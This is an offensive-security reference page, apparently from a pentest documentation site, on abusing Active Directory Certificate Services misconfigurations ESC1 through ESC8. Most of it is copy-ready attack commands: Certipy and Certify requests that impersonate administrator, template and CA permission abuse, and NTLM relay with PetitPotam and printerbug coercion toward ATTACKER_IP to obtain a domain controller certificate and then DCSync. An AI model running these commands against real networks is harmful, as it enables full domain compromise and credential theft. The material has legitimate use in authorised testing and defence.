> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# ESC1 — ESC8

> ADCS escalation paths ESC1 through ESC8: exploitation steps with Certify and Certipy.

## ESC1 — SAN in Template

Template allows enrollee to specify Subject Alternative Name (SAN). Request cert as any user.

### Conditions

* `ENROLLEE_SUPPLIES_SUBJECT` flag set
* Client Authentication EKU
* Low-privilege user can enroll

### Certify

```powershell theme={"dark"}
.\Certify.exe request /ca:CA_HOSTNAME\CA_NAME /template:VulnerableTemplate /altname:administrator
```

### Certipy

```bash theme={"dark"}
certipy req -u user@domain.local -p 'password' -ca CA_NAME -template VulnerableTemplate -upn administrator@domain.local -dc-ip DC_IP
certipy auth -pfx administrator.pfx -dc-ip DC_IP
```

***

## ESC2 — Any Purpose / No EKU

Template has `Any Purpose` EKU or no EKU at all → can be used for client auth.

### Exploit

Same as ESC1 if ENROLLEE\_SUPPLIES\_SUBJECT also set. Otherwise combine with ESC3 (enrollment agent).

***

## ESC3 — Enrollment Agent

Two-step: enroll as enrollment agent, then request cert on behalf of another user.

### Step 1 — Get Enrollment Agent Cert

```bash theme={"dark"}
certipy req -u user@domain.local -p 'pass' -ca CA_NAME -template EnrollmentAgent
```

### Step 2 — Request on Behalf Of

```bash theme={"dark"}
certipy req -u user@domain.local -p 'pass' -ca CA_NAME -template User -on-behalf-of 'DOMAIN\administrator' -pfx enrollment_agent.pfx
```

***

## ESC4 — Template ACL

Write access to certificate template → modify template to be vulnerable (ESC1).

### Certipy

```bash theme={"dark"}
certipy template -u user@domain.local -p 'pass' -template VulnTemplate -save-old
# Template now vulnerable to ESC1
certipy req -u user@domain.local -p 'pass' -ca CA_NAME -template VulnTemplate -upn administrator@domain.local
# Restore
certipy template -u user@domain.local -p 'pass' -template VulnTemplate -configuration VulnTemplate.json
```

***

## ESC5 — PKI Object ACL

Write access to CA server AD object, CA config, or PKI-related objects. Broad scope — depends on specific misconfiguration.

***

## ESC6 — EDITF\_ATTRIBUTESUBJECTALTNAME2

CA flag `EDITF_ATTRIBUTESUBJECTALTNAME2` allows SAN in **any** certificate request, regardless of template config.

### Check

```bash theme={"dark"}
certipy find -u user -p pass -dc-ip DC -stdout | grep -i "User Specified SAN"
```

### Exploit

Same as ESC1 — specify SAN in any template:

```bash theme={"dark"}
certipy req -u user@domain.local -p 'pass' -ca CA_NAME -template User -upn administrator@domain.local
```

***

## ESC7 — CA ACL (ManageCA)

Two distinct rights: **ManageCA** allows CA configuration changes (toggle the EDITF/SAN flag, enable templates, add officers); **ManageCertificates** (the "officer" right) approves/issues pending requests. A ManageCA-only attacker usually adds themselves as an officer first.

### Enable EDITF\_ATTRIBUTESUBJECTALTNAME2

Certipy cannot toggle this flag (there is no `-enable-flag`). Set it on the CA host with `certutil`, then restart the service:

```cmd theme={"dark"}
certutil -config "CA_HOST\CA_NAME" -setreg policy\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2
net stop certsvc && net start certsvc
```

Then exploit as ESC6. With only ManageCA over the network, prefer the SubCA-template route:

```bash theme={"dark"}
certipy ca -ca CA_NAME -u user@domain -p pass -add-officer user
certipy ca -ca CA_NAME -u user@domain -p pass -enable-template SubCA
# request a cert (will be pending), then issue + retrieve it
certipy ca -ca CA_NAME -u user@domain -p pass -issue-request REQUEST_ID
certipy req -ca CA_NAME -u user@domain -p pass -retrieve REQUEST_ID
```

### Approve Pending Requests

```bash theme={"dark"}
# Request with SAN (will be pending)
certipy req -u user -p pass -ca CA_NAME -template User -upn admin@domain.local

# Approve
certipy ca -ca CA_NAME -u user -p pass -issue-request REQUEST_ID

# Retrieve
certipy req -u user -p pass -ca CA_NAME -retrieve REQUEST_ID
```

***

## ESC8 — NTLM Relay to Web Enrollment

CA has HTTP enrollment endpoint → relay NTLM authentication to get certificate as victim.

### Setup Relay

```bash theme={"dark"}
impacket-ntlmrelayx -t http://CA_IP/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
```

### Coerce Authentication

```bash theme={"dark"}
python3 PetitPotam.py ATTACKER_IP DC_IP
# or
python3 printerbug.py DOMAIN/user:pass@DC_IP ATTACKER_IP
```

### Use Certificate

```bash theme={"dark"}
certipy auth -pfx dc.pfx -dc-ip DC_IP
# Returns DC machine hash → DCSync
```

***

## Quick Reference

| ESC  | Key Condition         | Exploit                             |
| ---- | --------------------- | ----------------------------------- |
| ESC1 | SAN + low-priv enroll | Request cert with `-upn admin`      |
| ESC2 | Any Purpose EKU       | Similar to ESC1                     |
| ESC3 | Enrollment Agent      | Two-step: agent cert → on-behalf-of |
| ESC4 | Write template ACL    | Modify template → ESC1              |
| ESC6 | EDITF flag            | SAN in any template                 |
| ESC7 | ManageCA perm         | Enable ESC6 or approve requests     |
| ESC8 | HTTP enrollment       | NTLM relay to CA                    |
